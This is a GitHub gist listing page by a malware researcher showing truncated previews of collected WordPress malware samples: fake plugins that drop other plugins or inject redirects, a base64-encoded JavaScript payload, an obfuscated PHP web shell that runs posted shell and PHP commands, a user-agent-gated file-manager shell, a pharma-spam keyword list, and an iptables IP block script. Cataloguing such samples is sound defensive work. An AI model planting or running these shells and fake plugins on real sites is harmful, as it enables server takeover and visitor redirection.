Salvador Aguilar malwador
⚔️
malwador
/ xwp-installer_15.php
Created
December 4, 2025 22:59
Fake WP plugin - XUpdater15 - used to drop malicious plugin XSystwo
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /** | |
| * Plugin Name: XWP Installer15 | |
| * Description: XWP Installer15 | |
| * Version: 1.2 | |
| * Author: WordPress | |
| */ | |
| register_activation_hook(__FILE__, 'xwp_installer_activate_15'); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /* | |
| Plugin Name: WP-DevReguE50A | |
| Description: WP-Net55zBlksLl | |
| Version: 2.0 | |
| Author: File16Pipe99Mod | |
| */ | |
| //Nete7493Map |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (()=>{let M=decodeURIComponent(atob("PGh0bWwgbGFuZz0iZW4tVVMiIGRpcj0ibHRyIj4KICA8aGVhZD4KICAgIDx0aXRsZT5KdXN0IGEgbW9tZW50Li4uPC90aXRsZT4KICAgIDxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PVVURi04IiAvPgogICAgPG1ldGEgbmFtZT0icm9ib3RzIiBjb250ZW50PSJub2luZGV4LG5vZm9sbG93IiAvPgogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCxpbml0aWFsLXNjYWxlPTEiIC8+CiAgICA8c3R5bGU+CiAgICAgICogewogICAgICAgIGJveC1zaXppbmc6IGJvcmRlci1ib3g7CiAgICAgICAgbWFyZ2luOiAwOwogICAgICAgIHBhZGRpbmc6IDA7CiAgICAgIH0KICAgICAgaHRtbCB7CiAgICAgICAgbGluZS1oZWlnaHQ6IDEuMTU7CiAgICAgICAgLXdlYmtpdC10ZXh0LXNpemUtYWRqdXN0OiAxMDAlOwogICAgICAgIGNvbG9yOiAjMzEzMTMxOwogICAgICAgIGZvbnQtZmFtaWx5OiBzeXN0ZW0tdWksIC1hcHBsZS1zeXN0ZW0sIEJsaW5rTWFjU3lzdGVtRm9udCwgU2Vnb2UgVUksIFJvYm90bywgSGVsdmV0aWNhIE5ldWUsIEFyaWFsLCBOb3RvIFNhbnMsIHNhbnMtc2VyaWYsIEFwcGxlIENvbG9yIEVtb2ppLCBTZWdvZSBVSSBFbW9qaSwgU2Vnb2UgVUkgU3ltYm9sLCBOb3RvIENvbG9yIEVtb2ppOwogICAgICB9CiAgICAgIGJvZHkgewogICAgICAgIGRpc3BsYXk6IGZsZXg7CiAgICAgICAgZmxleC1 |
malwador
/ PerformanceGuard.php
Created
August 18, 2025 18:31
PerformanceGuard - Fake WP Plugin injecting malicious JS Redirect
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /** | |
| * Plugin Name: Performance Guard | |
| * Plugin URI: https://github.com/techcraft/performance-guard | |
| * Description: An advanced plugin built to boost system efficiency, monitor performance metrics, and secure critical components. | |
| * Version: 1.0.0 | |
| * Author: TechCraft Team | |
| * Author URI: https://github.com/techcraft | |
| * Text Domain: performance-guard | |
| * License: MIT |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /** | |
| * @package HSEO | |
| * @version 0.0.1 | |
| */ | |
| /* | |
| Plugin Name: HSEO | |
| Description: SEO Plugin | |
| Author: H. | |
| Version: 0.0.1 |
malwador
/ SiteMaintenanceTemplate.html
Created
November 13, 2023 14:52
— forked from niksmac/SiteMaintenanceTemplate.html
Simple Maintenance Template Page - HTML CSS
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html lang="en"> | |
| <head> | |
| <title>Site Maintenance</title> | |
| <meta charset="utf-8"> | |
| <meta http-equiv="X-UA-Compatible" content="IE=edge"> | |
| <meta name="viewport" content="width=device-width, initial-scale=1"> | |
| <style> | |
| body { text-align: center; padding: 150px; } | |
| h1 { font-size: 50px; } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| goto IRGg0; IRGg0: ?> | |
| <style>body{background-color:#000;color:#fff}</style><form action=""enctype="multipart/form-data"id="uploader"method="post"name="uploader"><input name="file"type="file"size="50"><input name="_upl"id="_upl"type="submit"value="Upload"><br><br><label for="">PHP command</label><input name="phpcmd"id=""><input name="_upl"id="_upl"type="submit"value="run php command"><br><br><label for="">Shell command</label><input name="shellcmd"id=""><input name="_upl"id="_upl"type="submit"value="run shell command"></form><?php goto HCwez; z4H36: if ($_POST["\137\x75\160\154"] == "\162\x75\x6e\x20\x73\x68\x65\154\154\40\143\x6f\x6d\155\x61\156\144") { $tmpFile = tempnam(sys_get_temp_dir(), "\x64\171\156\141\x6d\x69\143"); $fileHandle = fopen($tmpFile, "\167"); $tmp = $_POST["\x73\150\145\154\154\143\155\144"]; $vari = "\74\77\x70\150\160\x20\145\x63\150\x6f\50\100\163\x68\145\154\x6c\137\145\x78\145\x63\50\x22" . $tmp . "\x22\x29\x29\73\x3f\76"; fwrite($fileHandle, $vari); fclose($fileHandle); ob_st |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Below is a list of the most common legal drugs that are used in the SEO Pharma SPAM hacks. | |
| ## The block of code might include also a link to a 3rd party and can include some CSS properties to hide the block of code off the page, or make it invisible. | |
| Abilify | |
| Accutane | |
| Acomplia | |
| Adderall |
malwador
/ gist:b233eb0c1da182b9b2d9de14de997d5d
Created
July 29, 2021 21:20
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| if ( md5(getenv('HTTP_USER_AGENT')) != '69bc3b342502573e6d727f341674f010') | |
| header('Location: ' . 'http://' . $_SERVER['HTTP_HOST'] ); | |
| $color = "#df5"; | |
| $dflt_actn = 'FilesWin'; | |
| @define('SELF_PATH', __FILE__); | |
| @session_start(); | |
| @ini_set('max_execution_time',0); | |
| if( get_magic_quotes_gpc() ) { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # script para bloquear IPs de china - salvador aguilar | |
| echo "Blocking 8444 Chinese IPs via IPTABLES" | |
| echo "======================= by Sal Aguilar" | |
| iptables -A INPUT -s 1.0.1.0/24 -j DROP | |
| iptables -A INPUT -s 1.0.2.0/23 -j DROP | |
| iptables -A INPUT -s 1.0.8.0/21 -j DROP | |
| iptables -A INPUT -s 1.0.32.0/19 -j DROP | |
| iptables -A INPUT -s 1.1.0.0/24 -j DROP | |
| iptables -A INPUT -s 1.1.2.0/23 -j DROP | |
| iptables -A INPUT -s 1.1.4.0/22 -j DROP |
NewerOlder